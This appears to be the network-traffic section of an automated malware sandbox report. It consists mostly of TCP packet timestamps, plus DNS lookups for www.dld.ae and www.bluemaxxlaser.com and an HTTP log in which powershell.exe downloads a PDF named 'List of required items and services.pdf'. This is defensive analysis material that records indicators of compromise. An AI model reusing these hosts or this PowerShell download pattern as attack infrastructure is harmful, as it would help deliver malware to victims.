                                                                    Jun 1, 2023 12:14:24.134440899 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.134486914 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.134490013 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.134536028 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.134541035 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.134598017 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.134645939 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.134695053 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.134711981 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.134744883 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.134794950 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.134802103 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.134845018 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.134907007 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.134954929 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.135015011 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.135077953 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.135080099 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.135130882 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.135176897 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.135238886 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.135262966 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.135288000 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.135335922 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.135358095 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.135384083 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.135406017 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.135432959 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.135481119 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.135509014 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.135528088 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.135576010 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.135637045 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.135684013 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.135726929 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.135734081 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.135781050 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.135828972 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.135843039 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.135891914 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.135941982 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.135972977 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.136116982 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.136167049 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.136195898 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.136212111 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.136257887 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.136305094 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.136353970 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.136404037 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.136408091 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.136452913 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.136501074 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.136507034 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.136548996 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.136605978 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.136657000 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.136672020 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.136708021 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.136728048 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.136760950 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.136811972 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.136859894 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.136862993 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.136909962 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.136923075 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.136961937 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137010098 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137023926 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.137057066 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137108088 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137116909 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.137156963 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137206078 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137217999 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.137254000 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137303114 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137307882 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.137350082 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137398958 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137406111 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.137444973 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137494087 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137497902 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.137541056 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137604952 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.137604952 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137651920 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137701035 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137706995 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.137753010 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137804985 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137808084 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.137854099 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137903929 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.137911081 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.137952089 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138015032 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138052940 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.138066053 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138114929 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138137102 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.138165951 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138216019 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138231993 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.138276100 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138370037 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138392925 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.138417959 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138472080 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.138479948 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138526917 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138586998 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138586998 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.138637066 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138683081 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.138684034 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138731956 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138782978 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138787031 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.138829947 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138876915 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138881922 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.138925076 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138972998 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.138972998 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.139033079 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139075041 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.139081001 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139127970 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139169931 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.139183044 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139225960 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139266968 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.139266968 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139308929 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139350891 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139357090 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.139391899 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139395952 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.139431953 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139436007 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.139472008 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139477968 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.139513016 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139517069 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.139554024 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139564991 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.139595032 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139600039 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.139635086 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139640093 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.139676094 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139681101 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.139715910 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139724016 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.139759064 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139786005 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.139801025 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139811993 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.139842033 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139847994 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.139883995 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139889956 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.139924049 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139931917 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.139966011 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.139975071 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.140007973 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.140018940 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.140048981 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.140053034 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.140089989 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.140100002 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.140130997 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.140136003 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.140171051 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.140182018 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.140213966 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.140219927 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.140254021 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.140259981 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.140307903 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.140316963 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.140368938 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.309600115 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.309669971 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.477736950 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.477981091 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.646567106 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.646718979 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.814474106 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.814563036 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:24.982383966 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:24.982577085 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:25.150537014 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:25.150693893 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:25.318594933 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:25.318717003 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:25.486538887 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:25.486737013 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:25.654625893 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:25.654762030 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:25.822554111 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:25.822635889 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:25.990361929 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:25.990473986 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:26.158298969 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:26.158413887 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:26.326280117 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:26.326467037 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:26.494314909 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:26.494395018 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:26.662198067 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:26.662323952 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:26.830166101 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:26.830343962 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:26.998085976 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:26.998265982 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:27.167221069 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:27.167440891 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:27.335238934 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:27.335412025 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:27.503474951 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:27.503545046 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:27.671287060 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:27.671360016 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:27.839104891 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:27.839229107 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:28.006948948 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:28.007041931 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:28.174928904 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:28.175102949 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:28.342801094 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:28.342873096 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:28.510611057 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:28.510763884 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:28.678600073 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:28.678749084 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:28.798535109 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:28.798643112 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:28.846596956 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:28.846743107 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:29.014518023 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:29.014666080 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:29.182444096 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:29.182570934 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:29.350327969 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:29.350636005 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:29.518359900 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:29.518425941 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:29.686300039 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:29.686444044 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:29.854289055 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:29.854458094 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:30.022283077 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:30.022463083 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:30.190215111 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:30.190423012 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:30.358268976 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:30.358464956 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:30.526343107 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:30.526566029 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:30.694380999 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:30.694581985 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:30.862448931 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:30.998011112 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:31.165976048 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:31.310548067 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:31.478369951 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:31.685607910 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:31.853530884 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:31.998132944 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:32.166249037 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:32.295021057 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:32.463007927 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:32.513806105 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:32.681720972 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:32.810714006 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:32.978646040 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:33.185759068 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:33.353780031 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:33.498289108 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:33.666207075 CEST8049694203.175.174.69192.168.2.6
                                                                    Jun 1, 2023 12:14:33.666409969 CEST4969480192.168.2.6203.175.174.69
                                                                    Jun 1, 2023 12:14:34.504628897 CEST4969480192.168.2.6203.175.174.69

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jun 1, 2023 12:14:19.433432102 CEST6460153192.168.2.68.8.8.8
                                                                    Jun 1, 2023 12:14:19.474711895 CEST53646018.8.8.8192.168.2.6
                                                                    Jun 1, 2023 12:14:19.480092049 CEST5957553192.168.2.68.8.8.8
                                                                    Jun 1, 2023 12:14:19.508985996 CEST53595758.8.8.8192.168.2.6
                                                                    Jun 1, 2023 12:14:22.578489065 CEST4978653192.168.2.68.8.8.8
                                                                    Jun 1, 2023 12:14:22.606877089 CEST53497868.8.8.8192.168.2.6

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Jun 1, 2023 12:14:19.433432102 CEST192.168.2.68.8.8.80x2e16Standard query (0)www.dld.aeA (IP address)IN (0x0001)false
                                                                    Jun 1, 2023 12:14:19.480092049 CEST192.168.2.68.8.8.80x1286Standard query (0)www.dld.aeA (IP address)IN (0x0001)false
                                                                    Jun 1, 2023 12:14:22.578489065 CEST192.168.2.68.8.8.80xc145Standard query (0)www.bluemaxxlaser.comA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Jun 1, 2023 12:14:19.474711895 CEST8.8.8.8192.168.2.60x2e16No error (0)www.dld.aedld.aeCNAME (Canonical name)IN (0x0001)false
                                                                    Jun 1, 2023 12:14:19.474711895 CEST8.8.8.8192.168.2.60x2e16No error (0)dld.ae84.16.234.51A (IP address)IN (0x0001)false
                                                                    Jun 1, 2023 12:14:19.508985996 CEST8.8.8.8192.168.2.60x1286No error (0)www.dld.aedld.aeCNAME (Canonical name)IN (0x0001)false
                                                                    Jun 1, 2023 12:14:19.508985996 CEST8.8.8.8192.168.2.60x1286No error (0)dld.ae84.16.234.51A (IP address)IN (0x0001)false
                                                                    Jun 1, 2023 12:14:22.606877089 CEST8.8.8.8192.168.2.60xc145No error (0)www.bluemaxxlaser.com203.175.174.69A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • www.dld.ae
                                                                    • www.bluemaxxlaser.com

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.64969384.16.234.51443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.649694203.175.174.6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jun 1, 2023 12:14:22.780630112 CEST541OUTGET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                    Host: www.bluemaxxlaser.com
                                                                    Connection: Keep-Alive
                                                                    Jun 1, 2023 12:14:22.948807001 CEST543INHTTP/1.1 200 OK
                                                                    Date: Thu, 01 Jun 2023 10:14:22 GMT
                                                                    Server: Apache
                                                                    Last-Modified: Sun, 28 May 2023 21:58:29 GMT
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 653248
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/pdf
